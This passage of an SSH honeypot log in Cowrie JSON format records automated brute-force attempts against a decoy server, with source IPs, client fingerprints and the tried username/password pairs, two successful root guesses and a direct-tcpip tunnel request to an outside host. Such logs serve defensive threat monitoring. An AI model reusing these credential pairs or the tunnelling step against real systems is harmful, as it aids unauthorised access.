""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:10:50.470846Z","src_ip":"196.251.86.249","session":"f00dfbd24b1f"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"test123","message":"login attempt [oracle/test123] failed","sensor":"my-vps","timestamp":"2025-08-26T10:10:52.245093Z","src_ip":"196.251.86.249","session":"f00dfbd24b1f"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:10:53.997028Z","src_ip":"196.251.86.249","session":"f00dfbd24b1f"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":47968,"dst_ip":"1.2.3.4","dst_port":22,"session":"0efd21246b39","protocol":"ssh","message":"New connection: 196.251.86.249:47968 (1.2.3.4:22) [session: 0efd21246b39]","sensor":"my-vps","timestamp":"2025-08-26T10:11:51.688265Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:11:52.217928Z","src_ip":"196.251.86.249","session":"0efd21246b39"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:11:52.218758Z","src_ip":"196.251.86.249","session":"0efd21246b39"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"test321","message":"login attempt [oracle/test321] failed","sensor":"my-vps","timestamp":"2025-08-26T10:11:54.572387Z","src_ip":"196.251.86.249","session":"0efd21246b39"}
{"eventid":"cowrie.session.closed","duration":"4.5","message":"Connection lost after 4.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:11:56.192382Z","src_ip":"196.251.86.249","session":"0efd21246b39"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51064,"dst_ip":"1.2.3.4","dst_port":22,"session":"4c017e84ba9a","protocol":"ssh","message":"New connection: 212.227.235.229:51064 (1.2.3.4:22) [session: 4c017e84ba9a]","sensor":"my-vps","timestamp":"2025-08-26T10:11:59.442261Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:11:59.456950Z","src_ip":"212.227.235.229","session":"4c017e84ba9a"}
{"eventid":"cowrie.client.kex","hassh":"19532158b559096b89b1a5f7d17175b2","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","arcfour128","arcfour","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 19532158b559096b89b1a5f7d17175b2","sensor":"my-vps","timestamp":"2025-08-26T10:11:59.760073Z","src_ip":"212.227.235.229","session":"4c017e84ba9a"}
{"eventid":"cowrie.login.failed","username":"web","password":"111111","message":"login attempt [web/111111] failed","sensor":"my-vps","timestamp":"2025-08-26T10:12:00.731344Z","src_ip":"212.227.235.229","session":"4c017e84ba9a"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:12:02.061438Z","src_ip":"212.227.235.229","session":"4c017e84ba9a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":29311,"dst_ip":"1.2.3.4","dst_port":22,"session":"9cd424ea2ebf","protocol":"ssh","message":"New connection: 212.227.235.229:29311 (1.2.3.4:22) [session: 9cd424ea2ebf]","sensor":"my-vps","timestamp":"2025-08-26T10:12:42.073901Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:12:42.075628Z","src_ip":"212.227.235.229","session":"9cd424ea2ebf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":29667,"dst_ip":"1.2.3.4","dst_port":22,"session":"173a967224a5","protocol":"ssh","message":"New connection: 212.227.235.229:29667 (1.2.3.4:22) [session: 173a967224a5]","sensor":"my-vps","timestamp":"2025-08-26T10:12:42.232848Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:12:42.233825Z","src_ip":"212.227.235.229","session":"173a967224a5"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T10:12:42.393045Z","src_ip":"212.227.235.229","session":"173a967224a5"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:12:43.078075Z","src_ip":"212.227.235.229","session":"173a967224a5"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T10:12:43.238137Z","session":"173a967224a5"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":48762,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ec7e8e61e57","protocol":"ssh","message":"New connection: 196.251.86.249:48762 (1.2.3.4:22) [session: 6ec7e8e61e57]","sensor":"my-vps","timestamp":"2025-08-26T10:12:53.532098Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:12:54.222395Z","src_ip":"196.251.86.249","session":"6ec7e8e61e57"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:12:54.223133Z","src_ip":"196.251.86.249","session":"6ec7e8e61e57"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"password","message":"login attempt [oracle/password] failed","sensor":"my-vps","timestamp":"2025-08-26T10:12:56.137651Z","src_ip":"196.251.86.249","session":"6ec7e8e61e57"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:12:57.793557Z","src_ip":"196.251.86.249","session":"6ec7e8e61e57"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49502,"dst_ip":"1.2.3.4","dst_port":22,"session":"3ed6b37bc0c5","protocol":"ssh","message":"New connection: 212.227.235.229:49502 (1.2.3.4:22) [session: 3ed6b37bc0c5]","sensor":"my-vps","timestamp":"2025-08-26T10:13:46.141377Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T10:13:46.160049Z","src_ip":"212.227.235.229","session":"3ed6b37bc0c5"}
{"eventid":"cowrie.client.kex","hassh":"19532158b559096b89b1a5f7d17175b2","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","arcfour128","arcfour","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 19532158b559096b89b1a5f7d17175b2","sensor":"my-vps","timestamp":"2025-08-26T10:13:46.467146Z","src_ip":"212.227.235.229","session":"3ed6b37bc0c5"}
{"eventid":"cowrie.login.failed","username":"bot","password":"bot","message":"login attempt [bot/bot] failed","sensor":"my-vps","timestamp":"2025-08-26T10:13:47.455655Z","src_ip":"212.227.235.229","session":"3ed6b37bc0c5"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:13:48.839043Z","src_ip":"212.227.235.229","session":"3ed6b37bc0c5"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:13:52.232825Z","src_ip":"212.227.235.229","session":"173a967224a5"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":49938,"dst_ip":"1.2.3.4","dst_port":22,"session":"78cc156db2a9","protocol":"ssh","message":"New connection: 196.251.86.249:49938 (1.2.3.4:22) [session: 78cc156db2a9]","sensor":"my-vps","timestamp":"2025-08-26T10:13:56.090807Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:13:56.837410Z","src_ip":"196.251.86.249","session":"78cc156db2a9"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T10:13:56.838788Z","src_ip":"196.251.86.249","session":"78cc156db2a9"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"passwd","message":"login attempt [oracle/passwd] failed","sensor":"my-vps","timestamp":"2025-08-26T10:13:58.993474Z","src_ip":"196.251.86.249","session":"78cc156db2a9"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:14:00.741894Z","src_ip":"196.251.86.249","session":"78cc156db2a9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46378,"dst_ip":"1.2.3.4","dst_port":22,"session":"b065d6b0dfa0","protocol":"ssh","message":"New connection: 212.227.235.229:46378 (1.2.3.4:22) [session: b065d6b0dfa0]","sensor":"my-vps","timestamp":"2025-08-26T10:14:06.250451Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:14:07.023216Z","src_ip":"212.227.235.229","session":"b065d6b0dfa0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T10:14:07.023937Z","src_ip":"212.227.235.229","session":"b065d6b0dfa0"}
{"eventid":"cowrie.login.success","username":"root","password":"Mahatru@123","message":"login attempt [root/Mahatru@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:14:09.923764Z","src_ip":"212.227.235.229","session":"b065d6b0dfa0"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:14:10.456960Z","src_ip":"212.227.235.229","session":"b065d6b0dfa0"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63438,"dst_ip":"1.2.3.4","dst_port":22,"session":"110db9d4c7d2","protocol":"ssh","message":"New connection: 217.72.205.35:63438 (1.2.3.4:22) [session: 110db9d4c7d2]","sensor":"my-vps","timestamp":"2025-08-26T10:14:24.453902Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:14:24.455693Z","src_ip":"217.72.205.35","session":"110db9d4c7d2"}
{"eventid":"cowrie.session.connect","src_ip":"139.19.117.131","src_port":40596,"dst_ip":"1.2.3.4","dst_port":22,"session":"82ff494d6d5c","protocol":"ssh","message":"New connection: 139.19.117.131:40596 (1.2.3.4:22) [session: 82ff494d6d5c]","sensor":"my-vps","timestamp":"2025-08-26T10:14:43.545460Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:14:43.546808Z","src_ip":"139.19.117.131","session":"82ff494d6d5c"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-26T10:14:43.564870Z","src_ip":"139.19.117.131","session":"82ff494d6d5c"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"19:bf:10:d7:8e:5f:95:08:c0:27:de:39:0d:15:da:54","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC69p6u0xvnBRcSMatDUAlflsayJHp3y3oKQEwChJvGGB3bJvVFL3YxuO/ZKyssjGUDv9R+8tBJVqd4kpEPZniPmndHCX4eDFB4gxG1sL7UsNR8yxY2QciMAf151vK51cckT8219DolaRkrjtOyUpj6g59Qwu76+3GWEyYOevE1x5fPqI5PCYBgE+uKL+Gd9FVutGnbjjWjBf9N3G4yHEgy7pR9DKVH90KnwKuaptqPeP5GFLSTVmslvN7h9j5i9Vz2YsTx1XclI2VKaPHObW30LGOAXOqtYo2dvN7h3rdCg/ijw8eUb0ELPHl6o6s4r2IkbLOtthBifhLUV0JgFOb5","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 19:bf:10:d7:8e:5f:95:08:c0:27:de:39:0d:15:da:54","sensor":"my-vps","timestamp":"2025-08-26T10:14:43.603558Z","src_ip":"139.19.117.131","session":"82ff494d6d5c"}
